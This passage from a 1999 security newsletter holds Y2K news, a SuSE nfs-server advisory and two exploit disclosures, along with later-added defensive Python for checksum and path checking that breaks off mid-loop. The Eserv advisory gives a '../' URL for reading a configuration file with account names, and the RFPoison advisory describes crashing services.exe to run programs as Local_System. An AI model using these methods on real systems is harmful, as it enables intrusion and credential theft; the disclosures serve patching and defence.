In our fascination with the spectacular rise of Microsoft's market success we seem to forget that they make only software tools. They do not make core business accounting packages. They do not make business applications. That market is serviced by products from the likes of PeachTree, Great Plains Software, and thousands of other vendors. There are no dominant players here. In the world of desktop accounting packages, to have $50 million in revenues is to be large.

The point I'm trying to drive home here is that our perceptions are upside down. Microsoft makes the base layer of operating system software and some of the specialized tools (database engines and language compilers) from which business applications are constructed. It's the teeny tiny (by comparison to the Microsoft behemoth) accounting package vendors like Great Plains Software ($85 million 1998 revenues) that use Microsoft hammers to build houses that people actually live in. As powerful, useful, and ubiquitous as MS Word and Excel have become, we have to remember that these are only the equivalent of a hammer or screwdriver.
As universal as these products have become, it is simply not possible to run a business of any size or complexity with just a word processor and spreadsheet. To be a business, you need a chart of accounts, a general ledger, double entry bookkeeping, inventory control and much, much more.

We've become so dazzled by Microsoft's ability to tell us it's time once again to upgrade to a more powerful operating system that we've lost sight of the fact that there are still tens of thousands of business applications in active use in both large and small enterprises, which are still running MS-DOS v5 on a 286 PC. There are huge segments of the marketplace that simply don't pay attention to the endless upgrade treadmill foisted on us by Microsoft and the media.

And because Microsoft took an early hard line on Y2K -- "that's a mainframe problem" -- from the beginning, large numbers of people, assuming that a smart, super rich guy like Bill Gates knows what he's talking about, have simply gone back to sleep about the Y2K risks lurking inside their business operations.

The tide of public opinion, represented in one aspect by the court's monopoly ruling, is beginning to shift against Microsoft. When core business applications running on defined-as-obsolete software (e.g., running on MS-DOS or Windows 3.1) go belly up in the new year, there are going to be a lot of very angry folks. These are business people who are not at all interested in an esoteric technical discussion about the differences between operating system tools and business applications. After all, the cynics said all along that Y2K was just a scam and that Gates & Co. would ride in at the last moment with a $49.95 fix-it special. The evidence is that many small businesses do not perceive themselves to be at risk and are planning to cope with Y2K in a "fix-on-failure" mode.
I believe that the building resentment against Microsoft's abusive tactics and undisputed monopoly powers will take an additional swing into negative territory come the new year, when core PC applications start going flaky. It certainly doesn't make sense to hold the tool builder responsible for the fact that your house collapsed, but the tool builder -- Microsoft in this instance -- has set themselves up for a mighty fall by turning a largely deaf ear to desktop Y2K risks.

@HWA

60.0 $50 MILLIONS FOR Y2K CENTER
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNS http://www.net-security.org/
by BHZ Wednesday 17th November 1999 on 4:57 pm CET

The government offered the first public glimpse Monday of its new $50 million Y2K nerve center, a highly computerized crisis room near the White House designed to track failures worldwide caused by the Year 2000 technology problem.

Link: SJ Mercury http://www.sjmercury.com/svtech/news/breaking/merc/docs/081106.htm

Government opens $50 million Y2K crisis center

WASHINGTON (AP) -- The government offered the first public glimpse Monday of its new $50 million Y2K nerve center, a highly computerized crisis room near the White House designed to track failures worldwide caused by the Year 2000 technology problem.

President Clinton's top Y2K adviser, John Koskinen, said the administration continues to believe there will be no major national problems, but said its Information Coordination Center will watch for ``some glitches'' anticipated during the New Year's date rollover.

``We hope that night will be really boring,'' said Koskinen, standing before a glass-empaneled room filled with high-end computers and digital maps showing global time zones. He called it ``the one place in the world with the most complete information.''

The government Monday also began cautioning against panic as people discover problems during the New Year's weekend, since some non-Y2K computer failures might simply coincide with the date rollover.
``We'll have failures from time to time whether you have a century date change or not,'' said Skip Patterson, who runs the Year 2000 program for Bell Atlantic Corp. Experts have previously warned of widespread phone outages if everyone tried to make a call around midnight -- what Koskinen described as ``Mother's Day by multiples.''

Nationwide almost every day, for example, some Internet sites crash, electricity temporarily fails or airline flights are delayed. In the earliest hours of Jan. 1, no one may know whether problems were caused by the Y2K bug or something else.

``The presumption is to blame all failures on Y2K that weekend,'' Koskinen said.

About 10 percent of all credit transactions fail routinely because, for example, equipment breaks down or because consumers are overextended or forget their ATM password, said Paul Schmelzer, an executive vice president for Orlando, Fla.-based Star Systems Inc., which processes about 2 billion financial transactions annually. He expects those same problems to show up Jan. 1.

``What consumers need to do if they go to an ATM on New Year's Day and find for whatever reason they can't get service, they should do what they do today -- go find a machine down the block or get cash back in the grocery store,'' Schmelzer said. ``Let's don't immediately assume we've got some serious Y2K problems.''

The government's Y2K crisis center is hardly a bunker -- it's on the 10th floor of a downtown building just blocks from the White House -- but it includes backup communications systems and entrance guards. Reports of any problems -- rated ``minor'' or ``significant'' -- will be shared with the White House and top government officials who will decide what to do.

Information overseas will be fed by the State and Defense departments and industry groups, starting at roughly 6 a.m. EST Dec. 31, when midnight falls worldwide first in New Zealand. A flurry of activity is expected as midnight arrives across U.S.
time zones, with more attention starting midday EST Jan. 2 as employees worldwide begin returning to their offices -- and turning on their computers -- for the first time since the date change.

Koskinen predicted that any hacker attacks could be more easily detected during the date rollover because computers will be so closely monitored.

A hacker calling himself ``Comdext0r'' vandalized a Web site at the Commerce Department late Sunday, warning people to ``run for your lives!'' and to ``hit your computer's power button and never, ever turn it on again'' because of the Y2K bug. A spokesman for the National Telecommunications and Information Administration, the government agency that handles high-tech policies, said its Internet site was altered about 9 p.m. Sunday but repaired about one hour later.

Koskinen noted that recreational hackers typically vandalize Web sites to demonstrate some vulnerability that a computer administrator failed to fix. He said he was hopeful hackers wouldn't try such demonstrations during the weekend date change.

``We think they will understand this is not the best time to do that,'' Koskinen said.

@HWA

61.0 EYES ON EXEC 2.32
~~~~~~~~~~~~~~~~~~~~~~

From HNS http://www.net-security.org/
by BHZ Wednesday 17th November 1999 on 4:44 pm CET

Eyes on Exec 2.32 is a set of tools which you can use to build your own host based IDS. It watches for programs getting exec'd and logs information about them to a file. Combined with perl this can be extremely powerful. Requires Linux kernel 2.2.

Link: Packet Storm http://packetstorm.securify.com/UNIX/IDS/eoe232.tar.gz

@HWA

62.0 CHECKPOINT AND LINUX
~~~~~~~~~~~~~~~~~~~~~~~~~

From HNS http://www.net-security.org/
by BHZ Wednesday 17th November 1999 on 4:37 pm CET

Check Point Software Technologies has created versions of its virtual private network (VPN) and security products for the Linux platform to help Linux users keep prying eyes on the Internet at bay.
Link: Checkpoint http://www.checkpoint.com

@HWA

63.0 NOVELL SIMPLIFIES THINGS
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNS http://www.net-security.org/
by BHZ Wednesday 17th November 1999 on 4:33 pm CET

Novell's chief executive Eric Schmidt yesterday announced an update to Novell's directory software that's intended to simplify the Web experience. A directory serves as a central repository for information concerning users, systems and network devices.

Link: CNET http://news.cnet.com/news/0-1003-200-1451504.html?dtn.head

Novell update intended to simplify Web logins, networks
By Wylie Wong
Staff Writer, CNET News.com
November 16, 1999, 9:15 p.m. PT

LAS VEGAS--Novell aims to untangle the Web, according to chief executive Eric Schmidt.

Speaking at a trade show here, Schmidt today announced an update to Novell's directory software that's intended to simplify the Web experience. A directory serves as a central repository for information concerning users, systems and network devices.

The constant pitfalls of surfing are all too familiar, Schmidt said. Consumers face the hassle of trying to remember login names and passwords, while businesses find it difficult to link their employees, suppliers and partners together and manage those relationships. Novell hopes networks will adopt its technology with the goal of making it easier to store and retrieve that information.

Novell, once struggling in the shadow of Microsoft, is attempting to make a comeback with its directory software technology as a strategic centerpiece. The company believes its directory can become a central information database for software developers to rely on.

Schmidt demonstrated how the technology works during his speech: With the update, the company's previously announced DigitalMe service allows Web portals, e-commerce firms and Internet service providers to let consumers control how their personal information is shared, used and maintained on the Net via a link to Novell's directory, or NDS.
"It's the holy grail that the networking CIO [chief information officer] is trying to achieve," Schmidt said.

In addition to the Internet-based directory update, called eDirectory, Novell released its NDS corporate edition for managing user information. The company also announced Net Publisher, which helps businesses manage the publication of content over the Web.

The eDirectory--based on previously released NDS version 8 technology--supports the NetWare, Microsoft Windows NT and Sun Microsystems Solaris operating systems. In the future, the directory also will support Linux, Compaq Tru64 and Windows 2000, the company said. The release of eDirectory will lead to several product introductions over the next several months, according to Schmidt.

Novell further announced two dozen partnerships, including AltaVista, BroadVision, Sun Microsystems, PeopleSoft and Oblix, which are either using the technology in their businesses or building the technology into their products. Novell wants to encourage corporations to rely on its directory, so that businesses come to use its central administrative database regardless of the operating system they are using.

"It's key to manage the information of users, to authenticate users on what kinds of information they have access to, and to provide single administration," said Eric Golin, chief technology officer of Broadvision, during a press conference today.

Novell executives are launching several promotions to market eDirectory. Independent software vendors can download a 100-user version of eDirectory and bundle it in their own applications.

@HWA

64.0 RPC.NFSD PROBLEMS
~~~~~~~~~~~~~~~~~~~~~~

From HNS http://www.net-security.org/
by BHZ Wednesday 17th November 1999 on 4:27 pm CET

The rpc.nfsd which is part of the nfs-server package was found to have two remote vulnerabilities.
Link: Packet Storm http://packetstorm.securify.com/advisories/suse/suse.nfs.txt

-----BEGIN PGP SIGNED MESSAGE-----

______________________________________________________________________________

                        SuSE Security Announcement

        Package:                nfs-server < 2.2beta47 within nkita
        Date:                   Fri, 12 Nov 1999 02:12:50 GMT
        Affected SuSE versions: all
        Vulnerability Type:     remote root compromise
        SuSE default package:   yes (not activated by default)
        Other affected systems: all linux systems using the nfs-server
______________________________________________________________________________

A security hole was discovered in the package mentioned above. Please update as soon as possible or disable the service if you are using this software on your SuSE Linux installation(s).

Other Linux distributions or operating systems might be affected as well, please contact your vendor for information about this issue.

Please note that we provide this information on an "as-is" basis only. There is no warranty whatsoever and no liability for any direct, indirect or incidental damage arising from this information or the installation of the update package.
_____________________________________________________________________________

1. Problem Description

   The rpc.nfsd which is part of the nfs-server package was found to have two remote vulnerabilities.

2. Impact

   Via a buffer overflow, remote root access can be achieved. Write access to the local filesystem which is exported is necessary. Another security problem is improper root_squash export handling.

3. Solution

   Update the package from our FTP server.
______________________________________________________________________________

Please verify these md5 checksums of the updates before installing:

f03592bc738b6fa5cfa2f3a21250125a  ftp://ftp.suse.com/pub/suse/axp/update/6.1/a1/nkita-99.11.11-0.alpha.rpm
c4fd6ad2029165a14e26140c56c64a06  ftp://ftp.suse.com/pub/suse/i386/update/6.1/a1/nkita-99.11.11-0.i386.rpm
75c7b4aa20d13f4b81428013690fbf3f  ftp://ftp.suse.com/pub/suse/i386/update/6.2/a1/nkita-99.11.11-0.i386.rpm
______________________________________________________________________________

You can find updates on our ftp-Server:

   ftp://ftp.suse.com/pub/suse/i386/update   for Intel processors
   ftp://ftp.suse.com/pub/suse/axp/update    for Alpha processors

or try the following web pages for a list of mirrors:

   http://www.suse.de/ftp.html
   http://www.suse.com/ftp_new.html

Our webpage for patches:               http://www.suse.de/patches/index.html
Our webpage for security announcements: http://www.suse.de/security

If you want to report vulnerabilities, please contact security@suse.de
______________________________________________________________________________

SuSE has got two free security mailing list services to which any interested party may subscribe:

   suse-security@suse.com - moderated and for general/linux/SuSE security discussions. All SuSE security announcements are sent to this list.

   suse-security-announce@suse.com - SuSE's announce-only mailing list. Only SuSE's security announcements are sent to this list.

To subscribe to the list, send a message to:
To remove your address from the list, send a message to:
Send mail to the following for info and FAQ for this list:
_____________________________________________________________________________

This information is provided freely to everyone interested and may be redistributed provided that it is not altered in any way.
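The verification step the advisory asks for ("verify these md5 checksums of the updates before installing"), as an added example that is not SuSE's own tooling: it parses the checksum lines printed above, keys them on the full download URL, and checks a local file against the digest recorded for the URL it was fetched from. The demo package contents and the example.invalid URL are constructed for the demonstration.

```python
"""Checking downloaded update packages against the md5 list in a security advisory.

Added example written for the SuSE advisory above; it is not SuSE's own tooling.
The checksum lines are copied from the advisory, the demo package content is
constructed, and the example.invalid URL is a placeholder.
"""
import hashlib
import hmac
import os
import tempfile

# The three checksum lines exactly as the advisory prints them: "<md5> <url>".
ADVISORY_CHECKSUMS = """
f03592bc738b6fa5cfa2f3a21250125a ftp://ftp.suse.com/pub/suse/axp/update/6.1/a1/nkita-99.11.11-0.alpha.rpm
c4fd6ad2029165a14e26140c56c64a06 ftp://ftp.suse.com/pub/suse/i386/update/6.1/a1/nkita-99.11.11-0.i386.rpm
75c7b4aa20d13f4b81428013690fbf3f ftp://ftp.suse.com/pub/suse/i386/update/6.2/a1/nkita-99.11.11-0.i386.rpm
"""

HEX = set("0123456789abcdef")


def parse_checksums(text: str) -> dict:
    """Map each download URL to its expected md5 (lowercase hex).

    Keyed on the full URL, not the basename: the 6.1 and 6.2 packages above share
    the name nkita-99.11.11-0.i386.rpm but have different digests, so a basename
    lookup would silently verify one of them against the wrong value.
    """
    expected = {}
    for line in text.splitlines():
        parts = line.split()
        if not parts:
            continue
        if len(parts) != 2:
            raise ValueError(f"unexpected checksum line: {line!r}")
        digest, url = parts
        digest = digest.lower()
        if len(digest) != 32 or not set(digest) <= HEX:
            raise ValueError(f"malformed md5 in {line!r}")
        expected[url] = digest
    return expected


def md5_of_file(path: str, chunk_size: int = 1 << 16) -> str:
    """Hash the file in chunks so a large package need not fit in memory."""
    h = hashlib.md5()
    with open(path, "rb") as fh:
        for chunk in iter(lambda: fh.read(chunk_size), b""):
            h.update(chunk)
    return h.hexdigest()


def verify_package(path: str, source_url: str, expected: dict) -> bool:
    """True only if source_url is listed in the advisory and the file's md5 matches."""
    if source_url not in expected:
        return False  # refuse to bless a file the advisory never listed
    return hmac.compare_digest(md5_of_file(path), expected[source_url])


def demo() -> tuple:
    """Constructed scenario with a stand-in 'package' whose md5 is known.
    Returns (good match, tampered file, URL not in the advisory)."""
    url = "ftp://example.invalid/update/demo-package.rpm"  # placeholder URL
    listing = parse_checksums(
        "b1946ac92492d2347c6235b4d2611184 " + url  # md5 of b"hello\n"
    )
    with tempfile.TemporaryDirectory() as d:
        path = os.path.join(d, "demo-package.rpm")
        with open(path, "wb") as fh:
            fh.write(b"hello\n")
        good = verify_package(path, url, listing)
        with open(path, "wb") as fh:
            fh.write(b"hello!\n")  # one byte changed
        tampered = verify_package(path, url, listing)
        unlisted = verify_package(path, url, parse_checksums(ADVISORY_CHECKSUMS))
    return good, tampered, unlisted


if __name__ == "__main__":
    print(demo())  # (True, False, False)
```

The md5 list only tells you the file you fetched is the file SuSE published; it says nothing about whether the list itself was tampered with in transit, which is what the PGP signature around the advisory is for, so check that signature before trusting the digests.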
Type Bits/KeyID Date User ID pub 2048/3D25D3D9 1999/03/06 SuSE Security Team - ------BEGIN PGP PUBLIC KEY BLOCK----- Version: 2.6.3i mQENAzbhLQQAAAEIAKAkXHe0lWRBXLpn38hMHy03F0I4Sszmoc8aaKJrhfhyMlOA BqvklPLE2f9UrI4Xc860gH79ZREwAgPt0pi6+SleNFLNcNFAuuHMLQOOsaMFatbz JR9i4m/lf6q929YROu5zB48rBAlcfTm+IBbijaEdnqpwGib45wE/Cfy6FAttBHQh 1Kp+r/jPbf1mYAvljUfHKuvbg8t2EIQz/5yGp+n5trn9pElfQO2cRBq8LFpf1l+U P7EKjFmlOq+Gs/fF98/dP3DfniSd78LQPq5vp8RL8nr/o2i7jkAQ33m4f1wOBWd+ cZovrKXYlXiR+Bf7m2hpZo+/sAzhd7LmAD0l09kABRG0JVN1U0UgU2VjdXJpdHkg VGVhbSA8c2VjdXJpdHlAc3VzZS5kZT6JARUDBRA24S1H5Fiyh7HKPEUBAVcOB/9b yHYji1/+4Xc2GhvXK0FSJN0MGgeXgW47yxDL7gmR4mNgjlIOUHZj0PEpVjWepOJ7 tQS3L9oP6cpj1Fj/XxuLbkp5VCQ61hpt54coQAvYrnT9rtWEGN+xmwejT1WmYmDJ xG+EGBXKr+XP69oIUl1E2JO3rXeklulgjqRKos4cdXKgyjWZ7CP9V9daRXDtje63 Om8gwSdU/nCvhdRIWp/Vwbf7Ia8iZr9OJ5YuQl0DBG4qmGDDrvImgPAFkYFzwlqo choXFQ9y0YVCV41DnR+GYhwl2qBd81T8aXhihEGPIgaw3g8gd8B5o6mPVgl+nJqI BkEYGBusiag2pS6qwznZiQEVAwUQNuEtBHey5gA9JdPZAQFtOAf+KVh939b0J94u v/kpg4xs1LthlhquhbHcKNoVTNspugiC3qMPyvSX4XcBr2PC0cVkS4Z9PY9iCfT+ x9WM96g39dAF+le2CCx7XISk9XXJ4ApEy5g4AuK7NYgAJd39PPbERgWnxjxir9g0 Ix30dS30bW39D+3NPU5Ho9TD/B7UDFvYT5AWHl3MGwo3a1RhTs6sfgL7yQ3U+mvq MkTExZb5mfN1FeaYKMopoI4VpzNVeGxQWIz67VjJHVyUlF20ekOz4kWVgsxkc8G2 saqZd6yv2EwqYTi8BDAduweP33KrQc4KDDommQNDOXxaKOeCoESIdM4p7Esdjq1o L0oixF12Cg== =pIeS - ------END PGP PUBLIC KEY BLOCK----- -----BEGIN PGP SIGNATURE----- Version: 2.6.3i Charset: noconv iQEVAwUBOCxSlney5gA9JdPZAQEUbgf/ZhcxgxXlrIcEZnFEtiWsRqrr6qRB9jyD uV4SqRTUa6ywdO9ZWsQIAvHXI2siTaUea99CJFkDxmNIWgz9Zg2WtiUa4nvKscQv jWV7yBxBvnpZVkFfZmm7X9Lo3vQgf3+6uocy+NAoiKsLWISazUY7rdahxgE3gEAY qFN3cP9B2ABtrTuLcUbaGWy57MDuQHEC1MiMv71UtkGSkX12OtMfrSIG5IXTdbjs wIkMj0KKtJNk2W4mWgUk1U2twWXb8ZVzRJwaP1XY2S/yjF898X9FcM6AzQBdBT/3 QVQ1viXvAhvI0k7Cxy6+QALieShi4cIWn8jK6+0S+2wFODohnakC/g== =rVGR -----END PGP SIGNATURE----- @HWA 65.0 Eserv 2.50 Web interface Server Directory Traversal Vulnerability ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From 
http://packetstorm.securify.com/ From owner-news@technotronic.com Thu Nov 4 22:28:55 1999 Return-Path: Received: from sword.damocles.com([209.100.46.1]) (3359 bytes) by packetstorm.securify.com via sendmail with P:esmtp/D:user/T:local (sender: ) id for ; Thu, 4 Nov 1999 22:28:53 -0800 (PST) (Smail-3.2.0.106 1999-Mar-31 #1 built 1999-Sep-18) Received: (from technomail@localhost) by sword.damocles.com (8.9.1a/8.9.1) id UAA16404 for news-resend-technotroniccom; Thu, 4 Nov 1999 20:42:27 -0600 X-Authentication-Warning: sword.damocles.com: technomail set sender to owner-news@technotronic.com using -f Received: from sword.damocles.com (vacuum@sword.damocles.com [209.100.46.1]) by sword.damocles.com (8.9.1a/8.9.1) with SMTP id UAA16399 for ; Thu, 4 Nov 1999 20:42:25 -0600 Date: Thu, 4 Nov 1999 20:42:25 -0600 (CST) From: Vacuum X-Sender: vacuum@sword.damocles.com To: news@technotronic.com Subject: Eserv 2.50 Web interface Server Directory Traversal Vulnerability Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-news@technotronic.com Precedence: bulk Status: RO ---------- Forwarded message ---------- Date: Thu, 4 Nov 1999 18:26:52 -0600 From: owner-news@technotronic.com To: owner-news@technotronic.com Subject: BOUNCE news@technotronic.com: Approval required: >From vacuum@sword.damocles.com Thu Nov 4 18:26:51 1999 Received: from ussrback.com (jupiter.hosting4u.net [209.15.2.9]) by sword.damocles.com (8.9.1a/8.9.1) with SMTP id SAA05681 for ; Thu, 4 Nov 1999 18:26:46 -0600 Received: from luck ([200.41.64.206]) by ussrback.com ; Fri, 05 Nov 1999 00:26:32 -0600 From: "Ussr Labs" To: "TECHNOTRONIC" Subject: Eserv 2.50 Web interface Server Directory Traversal Vulnerability Date: Thu, 4 Nov 1999 21:20:35 -0300 Message-ID: MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Priority: 3 (Normal) X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook IMO, Build 9.0.2416 (9.0.2910.0) Importance: Normal 
X-MimeOLE: Produced By Microsoft MimeOLE V5.00.2615.200

Eserv 2.50 Web interface Server Directory Traversal Vulnerability

Product:

Eserv/2.50 is the complete solution to access Internet from LAN:

 - Mail Server (SMTP and POP3, with ability to share one mailbox on the ISP, aliases and mail routing support)
 - News Server (NNTP)
 - Web Server (with CGI, virtual hosts, virtual directory support, web-interface for all servers in the package)
 - FTP Server (with virtual directory support)
 - Proxy Servers
   * FTP proxy and HTTP caching proxy
   * FTP gate
   * HTTPS proxy
   * Socks5, Socks4 and 4a proxy
   * TCP and UDP port mapping
   * DNS proxy
 - Finger Server
 - Built-in scheduler and dialer (dial on demand, dialer server for extern agents, scheduler for any tasks)

PROBLEM

UssrLabs found an Eserv Web Server Directory Traversal Vulnerability. Using the string '../' in a URL, an attacker can gain read access to any file outside of the intended web-published filesystem directory. There is not much to expand on this one....

Example:

http://127.1:3128/../../../conf/Eserv.ini

to show all configuration file including account names

Vendor Status: not contacted
Vendor Url: http://www.eserv.ru/
Program Url: http://www.eserv.ru/eserv/
Credit: USSRLABS

SOLUTION

Nothing yet.

@HWA

66.0 RFP9906 - RFPoison
     ~~~~~~~~~~~~~~~~~~

From rfp@wiretrip.net Mon Nov 1 09:20:06 1999
Date: Mon, 1 Nov 1999 08:18:50 -0600 (EST)
From: ".rain.forest.puppy."
To: vacuum@technotronic.com, thegnome@nmrc.org
Subject: RFP9906 - RFPoison

--- Advisory RFP9906 ----------------------------- rfp.labs -----------
Windows NT remote denial of service and compromise (RFPoison)
------------------------------ rain forest puppy / rfp@wiretrip.net ---

Table of contents:
- 1. Problem
- 2. Solution
- 3. Where to Get This Weapon of Mass Destruction
- 4. Miscellaneous Updates (Important stuff!)
-----------------------------------------------------------------------

My website has been launched!
Up to the minute advisories, tools, (and code fixes...heh) are available from http://www.wiretrip.net/rfp/
-----------------------------------------------------------------------

----[ 1. Problem

Interesting on how things go around/come around. Recently Luke Kenneth Casson Leighton posted a message on NTBugtraq in response to SP6 not fixing the LSA denial of service. He states that this problem is essentially "due to marshalling/unmarshalling MSRPC code being unable to cope with a NULL policy handle." He also states that they reported this problem to Microsoft around February 1999.

Well, no, I did not 'rediscover' the LSA denial of service (ala the AEDebug advisory earlier this month). I did, however, discover a different denial of service based out of services.exe. When sent a specific packet, it's possible to get srvsvc.dll to choke, and cause services.exe to reference a bad memory location.

For those geeks in the crowd, essentially srvsvc_netrshareenum in srvsvc.dll uses rpcrt4_ndrcomplexstructunmarshall to tweak a string, but returns a NULL. srvsvc_netrshareenum doesn't check for return value, adds four to the pointer, and passes it up a function stack until finally that memory is read (address 00000004). Blam...Dr. Watson.

So we have another problem due to marshalling/unmarshalling MSRPC code. This was found independently of Luke's info and the LSA vulnerability.

The impact is pretty severe. Services.exe handles named pipes for the system. Once this crashes, everything named-pipe-based goes with it. This means logons, logouts, remote system access (registry, server functions, etc), local server management, IIS, file sharing, etc...all go down the tube. However, the box will, for the most part, appear to function normally on the local side, until you do something involving a named pipe service. The only fix is to reboot...however, the shutdown procedure waits for every (non-existent) service to respond to shutdown, and timeout.
On a typical box this could cause the full shutdown procedure to push over a half-hour; therefore, hard reset is most likely needed. Also, once in a great while the bug will 'survive' during a reset. It may take two reboots to get the system back in order. Strange, yes. How, I'm not sure. But it's happened over a half dozen times across four separate boxes I've tested on.

Now, I'm sure some of you are thinking "well, denial of services suck. How can I own .gov and .mil websites with this?" (hi flipz and fuqrag)

Well, let's go back to David LeBlanc's response to RFP9903 (AEDebug advisory). He states, for AEDebug to really be a problem, you have to "make something crash that has higher access rights than you do." He also states "you've got to make a service go down that won't kill the machine." Bingo, this fits the bill. If we have access to change the AEDebug registry key, we can set what programs to run on crash, set autorun to True, and then crash services.exe. Our programs run as Local_System, the box is still alive (TCP/IP-wise) and usable via netcat and whatnot. A much more useful situation for a denial of service, don't you think?

Also, Eric Schultze has detailed out many situations where someone could have access to your AEDebug key. I suggest you read his tidbit. It's posted as document 11 in the knowledge base on my website, available at http://www.wiretrip.net/rfp/

So far, I have been able to use this exploit on NT 4.0 server and workstation, with various levels of SP 1, 3, 5, and 6 service packs installed. I even tried applying SP 5 with the following hotfixes (in the following order): lsareq, ipsrfix, csrssfx, ioctlfx, and igmpfix. I've also tried using the Security Configuration Editor on various different 'secure' system profiles, testing to see if perhaps a registry key affected it. After all modifications, the systems were still susceptible.

HOWEVER, I do have reports of two boxes *NOT* being susceptible. The reason for this, however, is unfound.
Information will be released when it is found. If you come across a situation where a box is impervious to the exploit, PLEASE EMAIL ME. I would really appreciate the entire install history of that particular system. Email to rfp@wiretrip.net.

----[ 2. Solution

Well, as previously stated, Luke and ISS informed Microsoft of the LSA vulnerability in February 1999. To be fair, I also reported this exact bug, along with the working exploit, to Microsoft on Oct 25th. Have not heard a word.

So, in the meantime, I can recommend two things:

- Block port 139 on your firewall. This, however, does not stop internal attack.

- Turn off the Server service. While inconvenient, this should be deemed as a temporary solution until Microsoft releases a patch.

Just for reference, shutting off the Server service will also shut down the Computer Browser service. Glitch, a fellow Wiretrip member, describes the functions of these services as follows:

SERVER: Used as the key to all server-side NetBIOS applications, this service is somewhat needed. Without this service, some of the administrative tools, such as Server Manager, could not be used. If remote administration is not needed, I highly recommend disabling this service. Contrary to popular belief, this service is NOT needed on a webserver.

COMPUTER BROWSER: The Computer Browser service is a function within Microsoft networking for gathering and distributing resource information. When active on a server, the server will register its name through a NetBIOS broadcast or directly to a WINS server.

So you should note that turning these services off will disable the server from participating in NetBIOS-related functions, including file sharing and remote management. But realistically, how many servers need this? Alternate means of content publishing (for webservers) exist (FTP and -ugh- FrontPage). Of course this leaves the myriad of other services though. I'd be interested to see how MS SQL fares.
It's hoped that between the services.exe and the lsass.exe denial of services, both based on bad RPC code, Microsoft will find this problem worthy of fixing. Now we wait...

----[ 3. Where to Get This Weapon of Mass Destruction

I use this title jokingly. But trust me, I have gone back and forth about the release of this exploit. However, as a proponent of full disclosure, I definitely will release a working exploit. But I do so with conditions:

- I will only release a Windows executable.

- The windows executable is coded to reboot (NT) or crash (9x) upon successful execution. If you blow something up, you blow up too.

- A few checks that keep the program from running if you run in a user context that does not allow the above 'safety features' to work.

But it is a working executable. I'm hoping this will at least curb the script kiddie activity. Of course, I'm sure this program will be reversed and a new version made within 6 hours of posting--but that's not my problem. This should be more than enough to verify/test the exploit, and I've provided the details of how it works and the solutions necessary for stopping it. The skilled will be able to go off this, and the, well, the abusers will hit the glass ceiling as intended. Thanks to Vacuum for helping me come up with a responsible solution.

Also, I want to make it very clear, before I tell you where to get the executable....

DO NOT ASK ME FOR SOURCE.
DO NOT ASK ME FOR SOURCE.
DO NOT ASK ME FOR SOURCE.
DO NOT ASK ME FOR SOURCE.
DO NOT ASK ME FOR SOURCE.
DO NOT ASK ME FOR SOURCE.
DO NOT ASK ME FOR SOURCE.

oh, and

DO NOT ASK ME FOR SOURCE.

I don't care who you are. All email asking for source will be instantly deleted. I don't care if you send me the secret to life--if it has "p.s. can I get the source?" I will pipe that thing to /dev/null, along with whatever goodies you may have sent me. Don't even joke; you won't get a reply.
Now that that's established, you can download RFPoison.exe from my website (of course) at http://www.wiretrip.net/rfp/

----[ 4. Miscellaneous Updates (Important stuff!)

- whisker 1.2.0 has been released! Includes the ability to bounce scans off of AltaVista (thanks to Philip Stoev) Plus some new feature additions, and new scan scripts, including a comprehensive script for scanning FrontPage (thanks to Sozni).

- flipz and fuqrag have been busy hacking .gov and .mil sites. Turns out they're using a vanilla copy of msadc2.pl. Check out msadc2.pl (their exploit) at my website.

- Zeus Technologies had an outstanding response to RFP9905. In under 12 hours they had a patched version available, and were all-around terrific in their private and public response. As an indication of how they do business, I would recommend Zeus Technologies as a vendor to anyone. Kudos for them.

- technotronic and rfp.labs have teamed up! We're going to combine a couple of resources--starting with the mailing list. Technotronic already puts out some good info on his list...now I'll be giving the same list up to date information on rfp.labs advisories, information, and other various cool info. If you're not on it already, you may consider joining. Signup at www.technotronic.com

- with the (sad?) end of octoberfest, I'm also pleased to see w00w00 take over with 'w00giving'--all through the month of November w00w00 will be releasing some more stuff! You can start looking for the first (of many) advisories today (Nov 1st).

Special greetings to Simple Nomad (and others) on this special day where the wheel finishes its cycle and starts its revolution anew.

--- rain forest puppy / rfp@wiretrip.net ----------- ADM / wiretrip ---
So what if I'm not elite. My mom says I'm special.
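Back to the Eserv directory traversal in 65.0 above: the advisory shows the '../' request but not the check a web server needs before it opens a requested file. The following is an added example, not Eserv's or USSR Labs' code, of that check: decode once, refuse double-encoded paths, treat backslash as a separator (Eserv ran on Windows), and walk the path components with a stack so that any '..' that would climb above the document root is an error rather than being silently collapsed. The document root /srv/www and the request paths in the demo are constructed sample values.

```python
"""Mapping a URL path onto a document root without letting '../' escape it.

Added example, not Eserv's or USSR Labs' code: the canonicalisation check that
the web interface in 65.0 above lacks. The document root /srv/www and the
request paths in the demo are constructed sample values.
"""
import posixpath
from urllib.parse import unquote


class TraversalError(ValueError):
    """The request path would resolve outside the document root."""


def safe_path(webroot: str, url_path: str) -> str:
    """Return the filesystem path under webroot for url_path, or raise.

    Purely lexical, so it needs no filesystem access and cannot be fooled by
    a file that does not exist yet. Three points matter:
      * decode percent-escapes once, then refuse anything that would decode
        again (double encoding such as %252e is a classic bypass);
      * treat backslash as a separator too, since Eserv ran on Windows;
      * walk the components with a stack so a '..' that climbs above the
        root is an error. posixpath.normpath('/../x') silently yields '/x',
        which hides exactly the condition we want to detect.
    """
    decoded = unquote(url_path)
    if unquote(decoded) != decoded:
        raise TraversalError(f"double-encoded path: {url_path!r}")
    if "\x00" in decoded:
        raise TraversalError("NUL byte in request path")
    stack = []
    for part in decoded.replace("\\", "/").split("/"):
        if part in ("", "."):
            continue
        if part == "..":
            if not stack:
                raise TraversalError(f"{url_path!r} escapes the document root")
            stack.pop()
        else:
            stack.append(part)
    return posixpath.join(webroot, *stack)


def is_rejected(webroot: str, url_path: str) -> bool:
    """Convenience wrapper: does the server refuse this request path?"""
    try:
        safe_path(webroot, url_path)
    except TraversalError:
        return True
    return False


if __name__ == "__main__":
    root = "/srv/www"
    for req in ("/index.html", "/docs/../index.html", "/100%25.html",
                "/../../../conf/Eserv.ini", "/%2e%2e/conf/Eserv.ini",
                "/%252e%252e/conf/Eserv.ini", "/..\\..\\conf\\Eserv.ini"):
        try:
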